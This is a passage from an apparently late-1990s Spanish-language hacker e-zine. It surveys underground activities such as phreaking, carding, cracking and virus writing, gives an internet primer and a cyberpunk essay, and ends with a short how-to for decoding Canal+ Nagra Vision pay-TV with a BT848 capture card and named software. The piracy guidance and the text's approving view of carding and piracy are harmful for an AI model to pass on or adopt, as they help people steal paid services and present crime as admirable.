telefonos, las tarjetas de credito, los programas o juegos (ya sea para desprotegerlos, modificarlos o ponerles bombas logicas), etc. Pero con el tiempo los hackers empezaron a especializarse en distintas actividades, porque unos no sabian programar tanto, otros decian que era mas emocionante joder con los telefonos, otros con ideas de que les gustaba destruir la informacion de los demas, otros querian robar numeros de tarjetas de credito, etc., etc.. En consecuencia, los hackers se separaron y se especializaron en algunos de los siguientes grupos: *PHREAKING: la actividad de dominar casi por completo las centrales telefonicas, para hablar gratis, cargar cuentas a otros, y divertirse haciendole pasar un muy mal rato a estas. Esta seria la actividad de hackear pura y exclusivamente las centrales telefonicas o el hackear mediante dispositivos llamados "boxes". Estos incluyeron parte de la palabra "hacking" en el nombre: la palabra "phreaking" es una mezcla de "phree" (slang de free que significa gratis) y hacking. Hay boxes de todos los colores y las mismas tienen distintas funciones. *CARDING: la actividad de comprar lo que sea a traves de numeros de tarjetas de credito robados o falsificados mediante calculos, ecuaciones y funciones matematicas; o utlizando programas para tal fin (los cuales no da la "expiration date" que es un GRAN problema). El carding verdadero o profesional consiste en "fabricar" las tarjetas; es decir, crear tarjetas gemelas. Como suponen seria hackear tarjetas de credito. *CRACKING: actividad dedicada a la desproteccion de programas de todo tipo que piden un numero de serie (serial number) o una clave de acceso. El cracking obviamente se usa tambien para descifrar claves para desencriptar datos. Dicen que el cracking es una violacion hacia nuestra privacidad, pero es discutible. Cracking = hackear programas o datos encriptados. En estos momentos el mejor grupo de cracking que hay es "Phrozen Crew", siguiendolo de cerca "United Cracking Force 2000"; pero como es de suponerse hay muchos otros. Existen personas que llaman crackers a los hackers que hacen da±o cuando entran en los sistemas, pero en mi opinion, estos se llaman "crashers". Los hackers usan a veces tecnicas de los crackers, por lo que es comun que se los confunda. *CRASHING: esta actividad es una variacion del cracking. Consiste en adulterar programas que originalmente son inofensivos agregandoles codigo dañino para destruir los datos almacenados en la computadora de sus enemigos. Tambien generalmente entran a los BBSs o servidores de internet con tecnicas de hacking/cracking y destruyen la informacion que hay ahi, con fines vengativos o por diversion (porque son ESTUPIDOS). Crashear (es una espa±olizacion de la palabra crashing) un sistema es destruirlo. Hay personas que me discuten que el hacking vino despues que del phreaking (o que deriva de el), lo unico que les puedo decir es que son dos cosas diferentes (telefonos - computadoras), lo que pasa es que se confunden porque hay hackers que hacen phreaking para no pagar la cuenta de telefono y phreakers que son hacker. En fin, no estoy aqui para discutir eso y podemos pasarnos horas discutiendo del tema; pero la idea base esta, que es lo importante. Estas fueron las variaciones (mas diectas) del hacking. Ahora paso a describir las demas "categorias" integrantes del Underground: *WAREZ: Warez viene de (soft)wares (la "z" es porque es vocabulario del tipo Underground). El warez es simplemente la copia indiscriminada de programas protegidos por (c)copyright, que supuestamente tienen que ser comprados para su uso. En una palabra el warez es la Pirateria tal como la conocemos y practicamos (quien no?). En la mayoria de los casos, los programas copiados estan crackeados para evitar las claves de acceso de los mismos o para anular cualquier otro dispositivo anti-copia. El Warez **NO** esta considerado **NI** aceptado dentro del Underground del Hacking y del Phreaking; esta dentro de su propio Underground. En realidad, la mayoria de los hackers ODIAN a los K-R|\D W|\r3Z d00dz (Kool-Radical Warez dudes), personas que para lo unico que viven es para bajarse programas completos (Warez) y se jactan de quien tiene la ultima version de que, o quien tiene mas 0-day-warez (programas que podian ser usados por 30 dias pero estan crackeados para poder ser utilizados indefinidamente). A estos "seres" se los considera enfermos mentales, ya que tienen adiccion por estos programas y solo los quieren acumular; ni siquiera los usan o saben para que sirven. Copiar un par de Warez NO significa ser un Wared Dood. Para mas informacion lee las Anti Warez Asocciation Magazine. Otra adiccion que surgio estos ultimos a±os que es del tipo del Warez y que podemos decir que esta dentro de su mismo underground (fuera del del hacking) es la adiccion por acumular los MP3 (formato de musica que comprime en un ratio de 12:1; algo asi como que una cancion de 5 minutos ocupe 6 megas). *ANARQUIA: Antes que nada... les pido por favor que no me escriban discutiendome que es o que no es la anarquia, realmente no tengo bases historicas ni filosoficas para explicarlo, solo explicare mas o menos de que se trata lo que se dice como "anarquia" en el Underground. La Anarquia es una ideologia, una forma de pensar. La Anarquia consiste en el no gobierno, el caos... hacer lo que cada uno quiera sin importar las consecuencias; sin gobierno, sin estado, sin presidente, gobernador o intendente, sin policias u otros organismos que representen organizacion o paz. Los anarquistas proponen los metodos para llegar a esto, pero no dicen que van a hacer luego que todo este destruido. Para conseguir alcanzar sus ideales, o para imponer sus ideologias atacan a todas estas formas de organizacion, generalmente infundiendo panico en las personas mediante el terrorismo. Aparece la palabra "terrorismo"; la mayoria confunde anarquista con terrorista. El anarquista es, generalmente, un terrorista que impone su ideologia. El anarquista usa tecnicas o elementos propios usados por los terroristas (asesinatos, bombas, etc), se hace notar y trabaja en grupos generalmente grandes de personas. Los terroristas, en cambio, mas que imponer su ideologia, quieren algo: lo hacen por dinero, para obtener algo, extorsion, porque fueron contratados, y, generalmente, para liberar a sus compañeros o algun criminal importante de la carcel, porque alguien les pago dinero para que mataran a alguien, porque les gusta, etc.. Trabajan en grupos reducidos y muy organizados. Te recomiendo que no los hagas enojar, y NUNCA les des nigun dato tuyo... aunque les podes dar los datos de tu enemigo para que lo "limpien". En el Underground se considera Anarquia a toda informacion que enseñe o explique como se hace una bomba, como se hace veneno, mezclas quimicas para volar un edificio, diferentes usos de la polvora y otras mezclas, tecnicas para robar todo tipo de cosas, como matar a alguien, como conseguir algo de alguien por la fuerza o por la psicologia, todas las formas posibles de venganza, como arruinarle la vida a las personas, como transformar un colegio o universidad en un caos, tecnicas de lavado de cerebro, masacre de animales... y miles de cosas mas. *LOCKPICKING: El lockpicking o locksmithing es la actividad de abrir cerraduras y candados de todas las clases que existen con diferentes tecnicas y elementos, informacion que supuestamente solo un cerrajero debe saber. *VIRUCKING O VIRIING: la actividad de crear virus, gusanos, troyanos o bombas logicas programando uno mismo (lo que se deberia hacer); modificando otros (llamados "hacks"), o utilizando programas para crearlos como el VCL, VCS, G2, NRLG, LAVI (es argentino?), etc.. *SOCIAL ENGENEERING: son tecnicas psicologicas para extraerle informacion a las personas que no te la quieren dar o que supuestamente no deberian dartela. Asi se obtienen facilmente los passwords, logins, numeros, etc.. Esta mas que una categoria dentro del underground es una TECNICA que se usa en el hacking. *MISCELANEOS: son todos los demas textos antes mencionados que no pueden caer especificamente en una de estas categorias. ║ 9.0 ║ INTERNET FOR DUMMIES (DEMASIADO BASICO) =-=-=-=-=-=-=-=-=-=-==-=-=-==-=-=-=-=- ADVERTENCIA: Si conoces algo de internet te sentiras ofendido al leer esto. Es DEMASIADO basico. Puede servir para que tu abuelita de 80 a±os entienda lo que es Internet antes de dejar este mundo. 9.1 QUE ES INTERNET? Expuesto de forma sencilla, Internet puede definirse como una "red de redes de computadoras, de alcance mundial". Las redes que se encuentran interconectadas abarcan desde grandes instalaciones gubernamentales, como las de la NASA o la National Science Foundation de EEUU, hasta redes universitarias, o mantenidas por organizaciones sin fines de lucro como la Cruz Roja, y las de corporaciones como IBM, Microsoft, etc.. Maestros y estudiantes utilizan Internet con fines educativos. Estrellas de rock, montañistas y musicologos acceden diariamente a la red. Abogados y doctores tambien se encuentran entre los usuarios. A pesar de la cantidad y diversidad de personas, empresas e instituciones que la utilizan, nadie es "dueño" de Internet: simplemente, cada usuario paga su coneccion para llegar a ella. Que ventajas ofrece estar conectado a Internet? Imaginemos un estudiante que desea averiguar sobre las cosechas de arroz en distintos paises. Rastreando a traves de la red los sitios donde puede recolectar la informacion, en pocos minutos habra obtenido datos que de otra manera le hubieran llevado dias. Desea conocer la ultima cotizacion de algunas "commodities"? Ningun problema, busquela en Internet. Quisiera comprar el ultimo CD de los Rolling Stones que no fue editado en su pais? Encarguelo por internet. 9.2 UN POCO DE HISTORIA En 1969 nace Internet, como un proyecto de la Agencia de Proyectos de Investigacion de Defensa Avanzados de EEUU (DARPA). EL mismo surgio de la necesidad de intercambiar informacion entre los investigadores y cientificos miliares, ubicados en sitios apartados. La red, que en principio se suponia que deberia soportar hasta un ataque nuclear sin perder la conexion, originariamente se llamo DARPANET y estaba formada por cuatro computadoras interconectadas. En 1972 ya se habian conectado 37 computadoras, o nodos, a la red, que paso a llamarse ARPANET, debido a un cambio en el nombre de la agencia que la administraba. Y como siempre ocurre esto, la aplicacion mas utilizada no fue la prevista sino un servicio no previsto, o al menos subvalorado en un principio: el correo electronico, o e-mail. Hacia 1984, la Fundacion Nacional de Ciencias de EEUU establece la NSFnet. Esta red se origina a partir de la necesidad de compartir la potencia de las grandes supercomputadoras instaladas por la NSF, con la computadora academica. Estos equipos eran tan caros que solo se construyeron cinco centros. En principio se habia previsto utilizar la red ARPANET, pero ya estaba saturada. Asi se decidio crear la NSFnet, utilizando la misma tecnologia que ARPANET, conectando los centros en forma regional. Cada region tenia acceso a por lo menos una supercomputadora, y el resto estaba conectado en forma mas o menos directa, a traves de routers o "distribuidores", dentro de la autopista. La NSFnet al poco tiempo resulto insuficiente. Para el año 1987 se redimensiono la NSFnet, incorporando formas de acceso mas rapidas gracias al aumento en la velocidad d4e modems y computadoras, lo que permitio extender su utilizacion por parte de investigadores universitarios y agencias con la condicion de pertenecer a paises aliados a EEUU. En los 90', caida del Muro mediante la red, se abrio para todo aquel que se pudiera conectar. 9.3 TCP/IP: UN PROTOCOLO DE COMUNICACIONES El principio unificador de Internet es un conjunto de protocolos de comunicaciones llamado TCP/IP (Transmision Control Protocol/Internet Protocol o Protocolo de Control de Transmision/Protocolo Internet). Un protocolo de comunicaciones permite comunicar computadoras que utilizan sistemas operativos diferentes entre si. En realidad, se puede establecer una "internet" (con minusculas) conectando dos redes de computadoras que utilicen distintos tipos de protocolos locales, pero usando TCP/IP como protocolo de interntet working. Virtualmente todo fabricante de sisemas cerrados provee soportes para TCP/IP. Para pertenecer a Internet, alguna parte de esta "internet" debe estar conectada, por ejemplo, al backbone (columna vertebral) de la NSFnet y ademas respetar las convenciones del direccionamiento IP. El esquema de direccionamiento de Internet se conoce como direccionamiento IP. Una direccion IP es un numero que identifica a la red y a un host (computadora) especifico de esa red. La direccion IP puede mapearse o traducirse como un nombre de dominio. Por ejemplo, Microsoft de EEUU tiene por nombre de dominioL microsoft.com, que a su vez podria subdividirse en otras redes mas pequeñas. Los dominios se agrupan de acuerdo al tipo de organizacion que los sustenta. Por ejemplo, los dominios de empresas comerciales se llama .com, los gubernamentales .gov, los educacionales .edu, etc.. Y para distinguir el pais de origen, se utiliza otra convencion similar. Des esta forma, el codigo de Argentina es .ar, de Canada .ca, etc.. Cada paquete tiene un header (similar a la informacion "destinatario" y "remitente" del correo) con una direccion IP que especifica el destino. El esquema de direccionamiento permite a las computadoras que corren el sofware IP tomar decisiones sobre el ruteo. La tabla de ruteo no apunta directamente al destino sino a una gateway (o compuerta) llamado next hop ("siguiente salto"). De esta forma, los datos viajan de un "hop" al siguiente siguiendo un camino que finalmente los conduce a su destino, en otra red. Los datos llegan como un unico conjunto, como en un paquete, estos deben distribuirse a las aplicaciones correspondientes. Para determinar cual es la aplicacion, TCP/IP utiliza ports. Estos ports son parte de la informacion incluida dentro del header de cada paquete, y determina la aplicacion destino. 9.4 FORMAS DE CONECTARSE A INTERNET 1) Por correo electronico: En el caso de la Argentina hasta hace poco su usted no pertenecia a un organismo oficial, universitario o asociacion sin fines de lucro, era la unica conexion disponible. Para hacer uso de ella, basta con suscribirse a un BBS que tenga este servicio dentro de sus opciones, y ya habra ingresado a la autopista. 2) Por Telnet: Telnet es un servicio que proveen ciertas computadoras (en general Unix) que estan conectadas directamente a Internet, y que consiste en utilizar la computadora del usuario como terminal remota. 3) Por linea telefonica (dial-up links): este servicio esta disponible en Argentina solo para aquellos usuarios que tienen acceso a computadoras conectadas en linea a Internet y consiste en utilizar el protocolo TCP/IP via modem. 4) Por linea dedicada (leased lines): Con este tipo de conexion, el usuario podria convertirse, incluso, de proveedor de informacion. 9.5 QUIENES COMPONEN INTERNET? Forman parte de Internet las siguientes redes o hosts: -FidoNet (32.000 maquinas; 2.560.000 usuarios) -BitNet (1.481 maquinas; 111.000 usuarios) -Core Internet (redes conectadas en linea, proveedoras de informacion: 2.500.000 maquinas; 7.800.000 usuarios) -Consumer Internet (usuario comun de Internet en linea: 3.500.000 maquinas; 13.500.000 usuarios) -UUCP 9.6 QUIENES ADMINISTRAN INTERNET? Desde sus comienzos Internet fue una red carente de planificacion ni organizacion central. Internet es el agregado de multiples voluntades y esfuerzos, tanto individuales como de instituciones universitarias, de investigacion, estatales y privadas. Entre ellas se puede mencionar: - InterNIC: Organizacion destinada a la asignacion de direcciones de red IP. Esta gerenciada por Network Solutions. - IAB: Inter Activities Board, o Concejo de Actividades de Internet. Esta compuesto por investigadores y se dedica a tomar decisiones y discutir temas pertinentes a la red. - IETF: Internet Engineering Task Force o Fuerza de Trabajo de Ingenieria de Internet, dependiente de la IAB. Es el organismo de estandarizacion de la red. - Internet Society: Sociedad Internet. Presidida por Vinton Cerf, el creador del protocolo TCP/IP, esta sociedad tiene como objetivo la difusion de Internet y de sus tecnologias. 9.7 QUE SE NECESITA PARA ESTAR ADENTRO? Lo minimo es tener una PC 386 o superior con Windows (puede ser version 3.1, 3.11, 95), tener un modem de 14.400 bps (V.32bis), 28.800 bps (V.34) o superior (preferentemente de marca conocida como US Robotics o Hayes, ya que los otros traen muchos problemas). Tambien se puede utilizar un modem menor, de 2.400 bps (V.22bis), pero esto hace demasiada lerda la espera y nos hace gastar mas dinero en la comunicacion. Luego tenemos que suscribirnos a una empresa (pagando una matricula), que nos permita la coneccion full-online en la que se paga una tarifa plana en la que tenemos horas y acceso ilimitado. Tambien hay opciones de menor cantidad de tiempo; el costo de esta coneccion varia de acuerdo al numero de horas mensuales que alquilemos para estar en linea. En nuestro pais el costo de las comunicaciones internacionales es altisimo, por lo que la suscripcion a Internet tambien es mayor que en otros paises. Por ultimo, mientras estamos conectados, estamos usando nuestro telefono (la linea), al costo de una llamada local. La empresa proveedora nos facilitara de un programa de conexion de TCP/IP con todos sus elementos para que nos podamos "sumar" a la red. 9.8 QUE SERVICIOS BRINDA INTERNET? - Servicios de recuperacion de informacion (FTP y Ghoper) - Servicios de busqueda de informacion (WAIS, Archie, Veronica) - Servicios de acceso remoto (Telnet) - Servicios de comunicaciones (e-mail, UseNet, IRC) - Servicios de informacion hipertexto/hipermedia (World Wide Web) 9.9 PRODUCTOS DE INTERNET * TELNET: Nos permite conectarnos a una computadora remota e interactuar con ella (como si fuera la nuestra); a esta se la denomina terminal boba. * FTP: Abreviacion de File Transfer Protocol (protocolo de transferencia de archivos), se utiliza para la transferencia de archivos a traves de la Internet; nos permite loguearnos a una maquina remota y acceder a su disco rigido, curiosear entre sus directorios y archivos, y copiar lo que nos parezca util a nuestra computadora. Asi se pueden obtener las ultimas versiones de los antivirus, etc.. * E-MAIL: (correo electronico) Nos permite comunicarnos con cualquier otro usuario de Internet en el mundo (hay cerca de 40.000.000) a traves de mensajes; hasta podemos enviarle archivos de nuestra computadora al destinatario. Un e-mail (que seria una carta), puede atravezar el mundo en cuestion de segundos... y una carta real por correo, llegara en un mes. * GOPHER: es la manera de buscar todo tipo de informacion a traves de menues muy faciles de usar con los que se puede acceder a casi toda la informacion de Internet, incluyendo FTP, Usenet, Newsgroups, etc. Esta es una de las herramientas mas poderosas de Internet. Dentro de los items de sus menues, existen referencias a otro servidor Gopher dentro de Internet que puede estar en otra parte del mundo; esta habilidad permite la creacion del Gopherspace, que es la red que se forma con las referencias cruzadas entre los distintos servidores Gopher. * ARCHIE: es una aplicacion que permite la busqueda de archivos dentro de Internet que se pueda bajar con FTP; este los indexa los nombres de los archivos FTP alrededor del mundo, permitiendo una busqueda similar a la del comando dir en DOS. * VERONICA: es un Archie muy mejorado y para Gopher; nos permite ubicar TODA la informacion disponible sobre un tema en particular, mediante la busqueda de una palabra en el Gopher Space (se busca por texto descriptivo y no por archivo). * NEWSGROUPS (Use Net): los newsgroups son grupos de noticias y discucion o foros de Internet nos permite intervenir en los casi 20.000 foros de discucion que se llevan a cabo hoy en dia. Se discuten temas desde interesantes hasta insolitos; nosotros podemos leer las opiniones de los demas y opinar si nos parece. Las noticias de los newsgroups se distribuyen a traves de un mecanismo que envia los mensajes individuales (articulos) de una computadora local a todas las computadoras que participan de UseNet (red de usuarios). Estas se conocen como servidores de news, que usan un protocolo NNTP. Los articulos se ingresan en un derterminado servidor de news local, y este a su vez lo despacha al siguiente servidor de Use Net, continuando la dadena. * W.A.I.S.: siglas de Wide Area Information Server o Servicio de Informacion de Area Ancha)es un metodo de consulta a bases de datos organizadas, obteniendo informacion especializada en diversos rubros y que busca el topico requerido en todos los archivos de los servidores de todo el mundo. * I.R.C.: Abreviacion de Internet Relay Chat. Nos permite dialogar en tiempo real con otros usuarios del mundo que esten en linea en ese momento. Si tenemos multimedia en nuestra PC podemos hablar a traves de un microfono y escuchar a traves de los parlantes (o sea hablar por telefono) con cualquier usuario del mundo, y pagando el precio de una llamada local. Si bien no tiene todavia la calidad y claridad del telefono estandar, funciona correctamente. La otra opcion es tener CUSSEME (especie de abreviacion de: "can you see me?" o de "see you, see me"), con la que comprando una mini-camara que cuesta $100 (dolares) podemos tener video y ver a la persona con la que hablamos. * WWW: Abreviacion de World Wide Web (la gran telaraña mundial). Nos permite observar fotografias, texto, hipertexto, y permite obtener audio y video a traves de Internet. Casi todas las empresas de renombre poseen un acceso a traves de Web Pages (que son las paginas que forman la WWW). Las Web Pages de las empresas nos proveen informacion sobre ellas, los productos que ofrecen, etc. Las universidades y colegios generalmente tambien tienen Web Pages. Las Home Pages (que es lo mismo pero de usuarios individuales), son Web Pages de usuarios individuales, los que pueden llegar a proveer informacion muy interesante. Algunos de ellos nos muestran sus colecciones, sus intereses, etc. Se pueden encontrar millones de cosas raras, insolitas e interesantes. Tambien por la World Wide Web se pueden realizar compras en el extranjero o hacer reservas de vuelo en lineas aereas u hoteleria, lo que NO recomiendo, porque les piden su numero de tarjeta de credito. La estupidez mas grande que una persona puede hacer es dar su numero de tarjeta por Internet... NO LO HAGAN, porque ese numero recorre cientos de routers y atraviesa muchos paises, por lo que es DEMASIADO facil que alguien lo copie y se abuse de el. Lo que conviene es esperar a que se imponga un protocolo de encripcion estandar para poder mandar ese tipo de informacion tan sensible y sea seguro. Como se ve, en todos los casos la informacion que se intercambia tiene un formato y una finalidad diferente. Esta informacion viaja a traves de computadoras dedicadas a tal efecto llamadas routers, que hacen el papel de agencias de correo distribuyendo la "correspondencia" (o sea la informacion) desde y hacia donde se lo quiera. Internet ya esta entre nosotros, y piensa quedarse. Habra que acostumbrarse a ella como lo hicimos con la television, o antes con el telefono. Principalmente, desde ya, nos brinda una gran ventaja: estar conectados con el resto del mundo. La epoca en donde las novedades tardaban en llegar quedaron atras. Con Internet el mundo se transforma en una aldea, donde esta todo cerca. Preparate, el futuro comenzo. ║ 10.0 ║ CYBERPUNKS =-=-=-=-=- [El siguiente texto fue copiado de la revista HyperMedia #4. La razon es porque el cyberpunk y su ideologia estan muy relacionados con el Hacking. Muchos hackers se identifican como Cyberpunks.] El futuro ha estallado en el presente. Las megacorporaciones abren nuevos gobiernos. Y hombres generados por computadoras abren nuevas fronteras. Ahora decimos: "Toda informacion debe ser libre". No lo es. La informacion es el poder y el dinero del mundo virtual. Entonces, desconfia de la autoridad. La cybercultura esta entrando en la sociedad y es la unica union entre el cyber-mundo y los sistemas abiertos. Bienvenidos a la cyber-corporacion. Cyperpunk. (Billy Idol) "El cyberpunk habla de utilizar las armas del sistema en beneficio propio, de darle otro uso a la tecnologia que el que los diseñadores pensaron para ella. La ideologia es vivir en los intersicios del sistema; esos lugares grises donde no te pueden cagar." Daniel Bugallo, revista Neuromante Muchas cosas se van perdiendo. Hay hombres que van dejando de ser hombres; la tecnologia no puede aun convertir sus cuerpos en maquinas, pero si chupar sus cerebros. Algunos proponen abandonar la pasividad ante la tecnologia: dejar de solo mirar la television, solo usar el e-mail para enviar correo electronico, dejar de solo usar las redes para jugar juegos multiusuario. Cyberpunks. Para ellos la revolucion digital es una peligrosa herramienta de dominacion. Su pensamiento tiene raices en las ideologias revolucionarias que fueron enterradas en un supuesto Fin de la Historia; ven en las corporaciones la materializacion de un sistema frio, sobervio. Sin embargo, post-modernos y nihilistas, ya no creen en un cambio radical que lo eche por tierra. Pero si creen que la dignidad aun es posible, y que las maquinas pueden ser usadas para subvertir, para encontrar huecos. Para, finalmente, seguir siendo seres humanos. Cyberpunk. EL cyberpunk narra historias de marginales inmersos en una cultura hiperdesarrollada tecnologicamente. Alli, los componentes tecnologicos se expanden como un cancer dentro de los huesos de la sociedad -a traves de redes y satelites- y dentro de los cuerpos de los hombres -a traves de implantes cerebrales y organos manipulados geneticamente-. Hay un sistema, encarnado en gobiernos y corporaciones, que domina las vidas de la mayoria de la gente; su mayor herramienta de dominacion es, claro, la tecnologia. Dentro de ese sistema, hay quienes viven del al margen: criminales, visionarios y aquellos que simplemente quieren gozar de su propia libertad. Marginales. Igual que aquellos punks de la decada del setenta crearon una estetica del desamparo. ------------------------------------------------------------------------------ Una narracion cyberpunk tiene como protagonista a uno de estos marginales; y cuenta como utilizar las herramientas tecnologicas del sistema para sus propios fines. Habla del cyberespacio, de los hackers, y de todos los tipos que combaten las frias normas del sistema, puntualiza Bugallo. ------------------------------------------------------------------------------ 10.1 EL MOVIMIENTO LITERARIO Al principio fue un movimiento literario. Eran los primeros latidos de la decada del 80. Un critico llamado Gardner Dozois uso la palabra por primera vez para designar un cuerpo literario. Dozois se declara a partir de entonces anti- cyberpunk. El termino lo sobrevivio. En 1984, un desconocido de nombre William Gibson publico un libro llamado "Neuromancer". Hoy viste, en copias descuajeringadas de tanta relectura, las bibliotecas de todo cyberpunk; es su "biblia". Lo acompañan las obras de Bruce Sterling. Ellos son los propes del movimiento literario. 10.2 LA SUBCULTURA El cyberpunk se fue transformando en una verdadera subcultura. A mediados de los 80, el movimiento empezo a ser tomado como referente por muchos jovenes norteamericanos. Ellos veian en la sociedad occidental de hoy la semilla del opresivo sistema tecnologico temido por el cyberpunk. Muchos se identificaban, ademas, con los personajes marginales de las historias. Algunos de estos grupos eran los hackers, phreakers y crackers. Los hackers, pese a que ya existian hace tiempo, cuando surgio el movimiento, fueron influenciados fuertemente por su filosofia. Pero no todos los hackers son cyberpunks, de acuerdo con la gente de la revista Neuromane: "Aca hay una reunion de hackers que se hace los primeros viernes de cada mes. Y son unos pelotudos que no te puedo explicar. Y no se si piensan lo que uno piensa. Creo que para ellos la mano es mas ludica: meterse, conocer, mas tipo desafio-"jueguitos electronicos" Tambien se sumaron a esta subcultura los cypherpunks, quienes ven en la criptografia una manera de zafar del sistema, al crear regiones de privacidad que este no pueda invadir. Y los ravers, que usan musica sampleada y sintetizada, arte psicodelico y drogas para armar fiestas nocturnas en bodegas abandonadas. Todos son personas reales, que viven en este mismo mundo y esta misma epoca, y creen que el futuro apocaliptico que narraba el cyberpunk esta ahi nomas, a la vuelta de la esquina. "La tecnologia va a rodear la tierra, y todo va a estar interconectado. Vas a comprar algo con la tarjeta de credito y las agencias de seguridad de todo el mundo van a saber en que gastas la guita. - anticipa Bugallo-. Esta va a ser la herramienta mas global que va a tener el sistema para manejar el mundo". 10.3 LA MODA DE HOY Sin embargo, el cyberpunk no tardo en transformarse en una moda, y perder a los ojos de la gente sus connotaciones subversivas. Dice Erich Schneider, de la FAQ de alt.cyberpunk: "para algunos `cyberpunk' es otro adolescente de todos los dias con algun talento tecnico o simplemente alguien que busca la ultima moda para identificarse con ella. Esto llevo a que mucha gente viera a los que se autoproclaman cyberpunks con malos ojos". Bugallo acuerda: "El cyberpunk empieza como un movimiento literario anarquista y se transforma en una moda. El sistema lo toma y, a partir de entonces, ser cyberpunk es andar con aritos como chips o hacer un disco como el que hizo Billy Idol. Lo mismo le paso al punk: fue un movimiento de los suburbios, compuesto por unos tipos que se habian quedado en la calle con los parates economicos de la decada del 70. Eran los tiempos en que vivian con el cheque del seguro social; es decir, con nada. Y armaron una estetica alrededor de eso: reciclaron ropa y usaron basura como adornos. Y tenian un mensaje contestatario contra ese sistema que los marginaba. Despues los agarraron las discograficas y los subvirtieron. Eso les pasa a todos. Hasta al cyberpunk. Justamente por eso creo que la etica es no encasillarse en nada. Hoy sera el cyberpunk, pero mañana no se". En una entrevista con Daniel Bugallo y Horacio Moreno (de la revista argentina Neuromante), se les pregunto: "Cual es la etica del cyberpunk?". Respondieron: Bugallo -Las renovaciones del estallido, de manifestacion social, se acabaron. La unica rebelion posible en la epoca en la que vivimos nosotros, tan interconectados, es lograr preservar tu libertad, utilizando lo que el sistema te da para preservarla. Lo que se plantea es vivir en los intersicios del sistema; darle nuestro propio uso a la tecnologia, para poder hablar con mayor libertad. Moreno -En definitiva, sobrevivir. Porque esa es la ley de la selva. Y para sobrevivir hay que ser astuto. ║ 11.0 ║ TANX 2 =-=-=- @ Omykron que sin su ayuda yo seria un ignorante mas. @ Hugo Cornwall quien me inspiro para escribir lo que hoy pudo ser este file. @ Mighty Maus (STOP SMOKING POT!!!). @ Fernando Bonstan... Bonsembiante, a quien varios le debemos las gracias por mas que se lo considere un lamer. Menos mal que la informacion debe ser LIBRE, GRATUITA y PARA TODOS, nooooooooo???... Larga la info man :) @ John Perry Barlow por su inspiracion e ideologias Cyberpunk. @ Don (Juan) Caballero por haber escaneado el "Hackers, la guerrilla informatica" porque no pensaba escribir todo lo que cut-pastee. @ RareGazz por publicar este documento. ║ 12.0 ║ CITAS =-=-= "Defendamos la libertad de expresion... es la unica arma que nos queda" -=STAIN=- "Liberen a Kevin Mitnik; el condor ha de volar una vez mas" "Promuevan la descentralizacion del poder y la informacion" "Recuerden... la verdad es barata, pero la informacion cuesta; liberen la informacion" -=R.D.T.=- "La informacion es poder, el poder son unos y ceros" "Hackeemos el planeta, todos los hackers unidos" -=Hackers, the movie=- "Digan todo lo que tengan que decir, la comunicacion es todo" "La informacion es la mejor arma de poder para el mago moderno" "Nunca dejes de buscar nuevas fronteras" "El hacker bien entendido es una especie de Robin Hood de la informacion" -=El Chacal=- [Ohh yes, The Chacal. The king, the god, the master of hackers. Ja, Ja, Ja] "Usar algo no significa que te tengas que abusas de el" -=STAIN=- "Para ser un hacker tu objetivo primario tiene que ser aprender por el bien de aprender, nada mas para descubrir que pasa si haces una cierta cosa en un momento particualr y bajo una condicion especifica." "En el siglo 21, quien controle las pantallas controlara las conciencias, la informacion y el pensamiento." -=Timothy Leary=-, 1921-1996 "Toda persona curiosa es un hacker potencial" -=HBO=- "Fuck ARiStOtlE" -=All the [NuKe] Memberz worldwide=- "El conocimiento es util, debe divulgarse y tiene caracter libertador ya que a mayor instruccion correspondera mayor virtud y mayor felicidad" -= Enciclopedia o Diccionario Razonado de las Ciencias, de las artes y de los oficios (1751); de Diderot y D'Alembert =- "El conocimiento es la fuerza de produccion fundamental y la informacion y su adecuada circulacion es imprescindible para el exito de los emprendiminetos" -= Posmodernismo =- -- EnD oF FiLe -- ((((((((((((((ZeD-wOrLd-EzInE numero 5))))))))))))))))))))))))))))))))))))))))))))))))))))))))) Decodificacion de sistemas Nagra Vision (canal+) La decodificacion de sistemas basados en la tecnologia Nagra Vision es algo que se esta poniendo muy de moda.Ya ha pasado mucho tiempo desde los primeros decodificadores de sonido y del primer decodificador de video para este sistema. La primera vez que tuve uno decodificador de audio fue aya por el año 1997,este no decodificaba en tiempo real,tenias que grabar una pista codificada en Wav y pasarla por el programa que te creaba otro Wav con la info decodificada (y una calidad bastante pesima) Ahora las cosas van bastante mas avanzadas,un grupo de universitarios alemanes,comenzaron el a±o pasado a fabricar los primeros decodificadores de video y audio en tiempo real. Para funcionar requieren un equipo + o - moderno ya que logras ver bien la se±al decodificada en un P-200 MMX con 64 de Ram pero lo decodifica,que es lo importante. Sistemas de codificacion de se±al como los que usa canal+,son llamados Nagra Vision,este sistema funciona de una forma silmilar al encryptado comun,solo que es capaz de hacerlo con audio y video.El sistema empleado para esta codificacion es a base de digitos,lo que hace exactamente es coger la se±al y dividirla en partes lineadas,cada linea lleva un codigo que es igual a otra linea,por ejemplo la linea numero 35 lleva la misma encryptacion que la nuemero 89,pero no que la 38,por eso cuando llega la se±al a tu aparto de TV este no es capaz de descifrarla y salen muchas rayas que distorsionan por completo la imagen. El sonido es codificado de tal manera que le da la vuelta,lo encrypta y ademas desnivela el nivel de ruido y distorsion,por eso no se entiende nada de lo que dicen. Actualmente la decodificacion de nagravision es algo que esta muy estudiado y ya es posible decodificar auido y video de una manera asequible (para el bolsillo). Los requerimientos de procesador son los antes comentados (para una decodificacion similar a la que te da un decodificador comprado a la empresa de TV),pero ademas tenemos que tener una tarjeta capturadora de video que contenga el chip BT848,este chip lleva en su interior una serie de alogaritmos que bien utilizados pueden llegar a decodificar la imagen. En internet ya se puden encontrar muchos programas que actuan de decodificador,estos lo que hacen es asignar unas ordenes concretas a la tarjeta caputradora para que muestre en pantalla la emision decodificada. Uno de los mejores programas que hay ahora mismo en la red es el Premiere,es capaz de decodificar la se±al con una calidad digna de un decodificador comercial,la unica pega es que al consumir mucha CPU es aconsejable tener un equipo muy potente (relativamente), yo con un P-200 y 32 de Ram,se puede decir que,decodifico la se±al aunque va a saltos aveces. Del sonido tamopo hay que preocuparse,ya que tambien hay muchos programas en internet que decodifican el audio en tiempo real con una calidad aceptable,la unica pega es que requieren una tarjeta de sonido soundblaster y es muy dificil hacerlos funcionar con otra trajeta por muy compatible que sea. Esto es una breve introduccion a la teoria,si quereis mas informacion,dirijiros a esta web: http://members.xoom.com/freeways_2/ ((((((((((((((ZeD-wOrLd-EzInE numero 5))))))))))))))))))))))))))))))))))))))))))))))))))))))))) CURSO DE ANTIVIRUS ------------------ Tercer capítulo: ENCRIPTACION XOR DE CLAVE VARIABLE ****************************************************************************** Disposición Legal: > Yo, el autor, declino toda 